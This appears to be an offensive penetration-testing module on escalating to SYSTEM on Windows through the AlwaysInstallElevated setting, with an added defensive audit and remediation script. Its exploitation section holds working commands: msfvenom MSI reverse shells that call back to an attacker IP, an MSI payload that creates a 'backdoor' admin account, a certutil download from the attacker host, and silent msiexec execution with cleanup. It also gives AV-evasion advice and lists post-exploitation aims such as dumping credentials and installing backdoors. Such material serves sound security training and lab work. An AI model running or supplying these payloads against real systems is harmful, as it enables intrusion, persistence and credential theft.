Always Install Elevated

# Overview

The AlwaysInstallElevated registry setting allows any user to install MSI (Microsoft Installer) packages with elevated (SYSTEM) privileges. When both HKLM and HKCU keys are set to 1, an attacker can create a malicious MSI package that executes arbitrary code as SYSTEM. This is one of the simplest Windows privesc vectors when present.

# Prerequisites

  • User-level shell access (cmd or PowerShell)
  • Ability to run reg query (always available)
  • msfvenom or WiX Toolset to generate MSI payloads

# Detection & Enumeration

```cmd
rem Check both registry keys (BOTH must be set to 1)
reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated
reg query "HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated

rem Expected output (both must show 0x1):
rem AlwaysInstallElevated    REG_DWORD    0x1
```

```powershell
# PowerShell check
$HKLM = Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
$HKCU = Get-ItemProperty "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
if ($HKLM.AlwaysInstallElevated -eq 1 -and $HKCU.AlwaysInstallElevated -eq 1) {
    Write-Host "AlwaysInstallElevated ENABLED - exploit with MSI payload"
}
```
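Added example (not part of the original module): a PowerShell audit that distinguishes a missing value from 0 and 1 in both hives, a remediation helper that sets both values to 0, and a query of the MsiInstaller events the OPSEC section mentions. The function names Get-AIEStatus, Disable-AIE and Get-RecentMsiInstalls are assumed names for this example.

```powershell
# Added example (not part of the original module): audit both keys with
# explicit handling for "missing" vs 0 vs 1, optionally remediate, and list
# recent Windows Installer events so an analyst can see what msiexec ran.
$Paths = @{
    HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

function Get-AIEStatus {
    $result = [ordered]@{}
    foreach ($hive in $Paths.Keys) {
        $value = (Get-ItemProperty -Path $Paths[$hive] -Name AlwaysInstallElevated `
                  -ErrorAction SilentlyContinue).AlwaysInstallElevated
        # $null means the key or value does not exist, which is the secure default
        $result[$hive] = if ($null -eq $value) { 'missing' } else { [int]$value }
    }
    $result.Exploitable = ($result.HKLM -eq 1 -and $result.HKCU -eq 1)
    [pscustomobject]$result
}

function Disable-AIE {
    # Remediation: explicitly set both values to 0 (HKLM needs admin rights).
    # Writing 0 rather than deleting the value records the intended policy state.
    foreach ($hive in $Paths.Keys) {
        if (-not (Test-Path $Paths[$hive])) { New-Item -Path $Paths[$hive] -Force | Out-Null }
        Set-ItemProperty -Path $Paths[$hive] -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
    Get-AIEStatus
}

function Get-RecentMsiInstalls {
    param([int]$Hours = 24)
    # MsiInstaller writes to the Application log; installs launched with
    # msiexec /i appear here regardless of /qn. No event ID filter is applied
    # so unusual messages (e.g. a package path under C:\Windows\Temp) are not missed.
    Get-WinEvent -FilterHashtable @{
        LogName      = 'Application'
        ProviderName = 'MsiInstaller'
        StartTime    = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, UserId, @{n='Message';e={$_.Message -replace '\s+',' '}}
}

$status = Get-AIEStatus
$status | Format-List
if ($status.Exploitable) {
    Write-Warning 'AlwaysInstallElevated is enabled in both hives; run Disable-AIE and review Get-RecentMsiInstalls'
}
```

If the value is delivered by Group Policy, fix it in the policy object as well, since a local change is overwritten at the next policy refresh.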

# Exploitation / Execution

# MSFvenom MSI Payload Generation

```bash
# On attacker machine, generate MSI payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o payload.msi

# Alternative: add a local admin user
msfvenom -p windows/exec CMD="net user backdoor Password123! /add && net localgroup administrators backdoor /add" -f msi -o adduser.msi

# Alternative: PowerShell reverse shell
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o psrev.msi
```

# Executing the MSI Payload

```cmd
rem Transfer payload.msi to target (certutil, iwr, smb, etc.)
certutil -urlcache -f http://10.10.14.5/payload.msi C:\Windows\Temp\payload.msi

rem Execute with msiexec (quiet mode, no UI, no restart)
msiexec /quiet /qn /i C:\Windows\Temp\payload.msi

rem /quiet = silent installation, no user interaction
rem /qn    = no GUI (completely silent)
rem /i     = install

rem For add-user payload, verify:
net user backdoor
net localgroup administrators

rem Cleanup
msiexec /quiet /qn /x C:\Windows\Temp\payload.msi
del C:\Windows\Temp\payload.msi
```

# PowerUp.ps1 Detection

```powershell
. .\PowerUp.ps1
# Invoke-AllChecks will automatically flag AlwaysInstallElevated if enabled

# Manually check:
Get-RegistryAlwaysInstallElevated
# Returns True if both keys are set
```

# Common Pitfalls

  • Both HKLM AND HKCU keys must be set to 1 -- if either is 0 or missing, the exploit fails
  • msfvenom MSI payloads are heavily signatured by AV -- encode, encrypt, or use custom MSI builds
  • Some Windows versions require the Windows Installer service to be running -- check with sc query msiserver
  • Group Policy may revert the registry keys -- exploit quickly after discovery
  • The msiexec /qn flag suppresses all UI, but the process is still visible in task manager

# OPSEC Considerations

  • reg query is a standard command and unlikely to trigger alerts.
  • msfvenom MSI payloads are signatured by Windows Defender -- likely to be quarantined on execution.
  • msiexec execution is logged in the Windows Installer event log and Application event log.
  • The MSI installation creates entries in the Programs and Features list.
  • Consider using custom MSI builds with WiX Toolset or Orca to avoid AV signatures.

# Post-Exploitation Value

Successful exploitation provides SYSTEM-level command execution. From SYSTEM: dump credentials, create persistent admin users, install backdoors, disable security controls, pivot to domain resources. The SYSTEM shell can be upgraded to a more stable beacon or used for immediate credential extraction.

# Cross-References

# Tool References

| Tool | Link |
| --- | --- |
| msfvenom | Part of Metasploit Framework |
| PowerUp.ps1 | https://github.com/PowerShellMafia/PowerSploit |
| WiX Toolset | https://wixtoolset.org/ |

# Source Machines

  • Generic Windows machines with misconfigured AlwaysInstallElevated policy